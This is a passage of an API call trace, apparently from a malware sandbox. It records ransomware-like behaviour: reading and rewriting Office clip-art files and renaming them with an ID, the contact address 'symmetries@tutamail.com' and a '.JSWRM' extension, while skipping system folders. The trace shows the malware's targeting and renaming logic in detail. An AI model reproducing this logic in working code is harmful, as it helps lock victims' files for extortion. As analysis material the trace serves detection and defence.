Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107134.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107134.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0081.815] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=48388) returned 1 [0081.815] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.815] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbd00) returned 0x24d210 [0081.816] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xbd00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xbd00, lpOverlapped=0x0) returned 1 [0081.865] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.865] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xbd00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xbd00, lpOverlapped=0x0) returned 1 [0081.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0081.866] CloseHandle (hObject=0x314) returned 1 [0081.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0081.866] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0081.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0081.866] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0081.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0081.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0081.866] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0081.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0081.866] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0081.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0081.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0081.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0081.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0081.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0081.866] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107134.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107134.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107134.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107134.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0081.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0081.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0081.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0081.867] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe69d9e5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe69d9e5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe6c3c1e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4330, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107138.WMF", cAlternateFileName="")) returned 1 [0081.868] lstrcmpiW (lpString1="J0107138.WMF", lpString2=".") returned 1 [0081.868] lstrcmpiW (lpString1="J0107138.WMF", lpString2="..") returned 1 [0081.868] lstrcmpiW (lpString1="J0107138.WMF", lpString2="...") returned 1 [0081.868] lstrcmpiW (lpString1="J0107138.WMF", lpString2="windows") returned -1 [0081.868] lstrcmpiW (lpString1="J0107138.WMF", lpString2="recovery") returned -1 [0081.868] lstrcmpiW (lpString1="J0107138.WMF", lpString2="perflogs") returned -1 [0081.868] lstrcmpiW (lpString1="J0107138.WMF", lpString2="documents and settings") returned 1 [0081.868] lstrcmpiW (lpString1="J0107138.WMF", lpString2="$RECYCLE.BIN") returned 1 [0081.868] lstrcmpiW (lpString1="J0107138.WMF", lpString2="system volume information") returned -1 [0081.868] lstrcmpiW (lpString1="J0107138.WMF", lpString2="msocache") returned -1 [0081.868] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0081.868] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107138.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.868] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107138.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107138.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0081.868] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0081.868] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107138.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.868] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107138.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107138.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0081.868] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0081.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0081.868] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0081.868] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0081.868] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0081.868] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107138.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107138.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0081.869] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=17200) returned 1 [0081.869] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4330) returned 0x24d210 [0081.870] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4330, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4330, lpOverlapped=0x0) returned 1 [0081.872] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.872] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4330, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4330, lpOverlapped=0x0) returned 1 [0081.872] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0081.872] CloseHandle (hObject=0x314) returned 1 [0081.872] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0081.873] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0081.873] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0081.873] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0081.873] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0081.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0081.873] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0081.873] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0081.873] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0081.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0081.873] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0081.873] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0081.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0081.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0081.873] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107138.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107138.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107138.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107138.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0081.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0081.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0081.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0081.874] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe69d9e5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe69d9e5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe69d9e5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3a94, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107146.WMF", cAlternateFileName="")) returned 1 [0081.874] lstrcmpiW (lpString1="J0107146.WMF", lpString2=".") returned 1 [0081.874] lstrcmpiW (lpString1="J0107146.WMF", lpString2="..") returned 1 [0081.874] lstrcmpiW (lpString1="J0107146.WMF", lpString2="...") returned 1 [0081.874] lstrcmpiW (lpString1="J0107146.WMF", lpString2="windows") returned -1 [0081.874] lstrcmpiW (lpString1="J0107146.WMF", lpString2="recovery") returned -1 [0081.874] lstrcmpiW (lpString1="J0107146.WMF", lpString2="perflogs") returned -1 [0081.874] lstrcmpiW (lpString1="J0107146.WMF", lpString2="documents and settings") returned 1 [0081.874] lstrcmpiW (lpString1="J0107146.WMF", lpString2="$RECYCLE.BIN") returned 1 [0081.874] lstrcmpiW (lpString1="J0107146.WMF", lpString2="system volume information") returned -1 [0081.874] lstrcmpiW (lpString1="J0107146.WMF", lpString2="msocache") returned -1 [0081.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0081.874] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107146.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.874] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107146.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107146.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0081.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0081.874] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107146.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.874] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107146.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107146.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0081.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0081.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0081.874] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0081.874] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0081.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0081.874] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107146.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107146.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0081.875] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=14996) returned 1 [0081.875] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3a90) returned 0x24d210 [0081.875] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3a90, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3a90, lpOverlapped=0x0) returned 1 [0081.877] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.877] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3a90, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3a90, lpOverlapped=0x0) returned 1 [0081.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0081.877] CloseHandle (hObject=0x314) returned 1 [0081.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0081.878] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0081.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0081.878] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0081.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0081.878] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0081.878] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0081.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0081.878] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0081.878] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0081.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0081.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0081.878] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0081.878] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0081.878] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107146.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107146.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107146.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107146.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0081.879] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0081.879] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0081.879] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0081.879] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe69d9e5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe69d9e5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe69d9e5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4ea8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107148.WMF", cAlternateFileName="")) returned 1 [0081.879] lstrcmpiW (lpString1="J0107148.WMF", lpString2=".") returned 1 [0081.879] lstrcmpiW (lpString1="J0107148.WMF", lpString2="..") returned 1 [0081.879] lstrcmpiW (lpString1="J0107148.WMF", lpString2="...") returned 1 [0081.879] lstrcmpiW (lpString1="J0107148.WMF", lpString2="windows") returned -1 [0081.879] lstrcmpiW (lpString1="J0107148.WMF", lpString2="recovery") returned -1 [0081.879] lstrcmpiW (lpString1="J0107148.WMF", lpString2="perflogs") returned -1 [0081.879] lstrcmpiW (lpString1="J0107148.WMF", lpString2="documents and settings") returned 1 [0081.879] lstrcmpiW (lpString1="J0107148.WMF", lpString2="$RECYCLE.BIN") returned 1 [0081.879] lstrcmpiW (lpString1="J0107148.WMF", lpString2="system volume information") returned -1 [0081.879] lstrcmpiW (lpString1="J0107148.WMF", lpString2="msocache") returned -1 [0081.879] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0081.879] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107148.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.879] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107148.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107148.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.879] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0081.879] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0081.879] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107148.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.879] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107148.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107148.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.879] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0081.879] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0081.879] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0081.879] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0081.879] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0081.879] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0081.880] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107148.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107148.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0081.880] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=20136) returned 1 [0081.880] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.880] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4ea0) returned 0x24d210 [0081.881] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4ea0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4ea0, lpOverlapped=0x0) returned 1 [0081.883] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.883] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4ea0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4ea0, lpOverlapped=0x0) returned 1 [0081.883] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0081.883] CloseHandle (hObject=0x314) returned 1 [0081.884] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0081.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0081.884] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0081.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0081.884] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 